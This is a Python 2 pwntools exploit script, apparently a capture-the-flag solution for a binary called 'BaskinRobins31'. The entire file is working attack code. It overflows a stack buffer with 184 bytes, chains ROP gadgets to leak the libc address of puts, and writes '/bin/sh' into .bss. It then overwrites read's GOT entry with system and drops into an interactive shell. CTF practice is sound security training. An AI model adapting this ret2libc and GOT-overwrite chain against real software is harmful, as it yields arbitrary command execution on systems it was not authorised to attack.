from pwn import *
s = process("./BaskinRobins31")
libc = ELF("./libc")
elf = ELF("./BaskinRobins31")
s.recvuntil("How many numbers do you want to take ? (1-3)")
cmd = "/bin/sh\x00"
pop_rdi = 0x00400bc3
pop_rdx = 0x0040087c
pop_rbp = 0x0040087f
pop_rsi_r15 = 0x00400bc1
main = 0x400A4B
gdb.attach(s)
pay = "A"*184
pay += p64(pop_rdi)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(4)
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])
s.sendline(pay)
s.recvuntil("Don't break the rules...:(")
s.recv(2)
puts_libc = u64(s.recv(6)+"\x00\x00")
print "puts_libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)
s.send(cmd)
s.send(p64(system))
s.interactive()
